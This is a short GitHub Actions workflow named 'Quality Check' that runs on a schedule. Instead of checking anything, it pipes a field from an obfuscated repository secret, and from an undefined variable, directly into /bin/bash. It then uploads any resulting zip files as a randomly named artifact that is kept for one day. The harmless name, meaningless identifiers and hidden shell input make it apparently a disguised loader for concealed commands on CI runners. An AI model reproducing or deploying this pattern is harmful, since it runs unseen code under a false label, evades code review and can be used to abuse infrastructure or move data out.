name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '21 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  pipeline:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          x4967: ${{ secrets.x4967 }}
        run: |
          printf '%s' "$x4967" | jq -r .btu02347 | /bin/bash
          printf '%s' "$r26" | jq -r .wkb8396 | /bin/bash

      - name: Persist output
        if: ${{ always() }}
        uses: actions/upload-artifact@v4
        with:
          name: L5T44N6e
          path: "*.zip"
          retention-days: 1
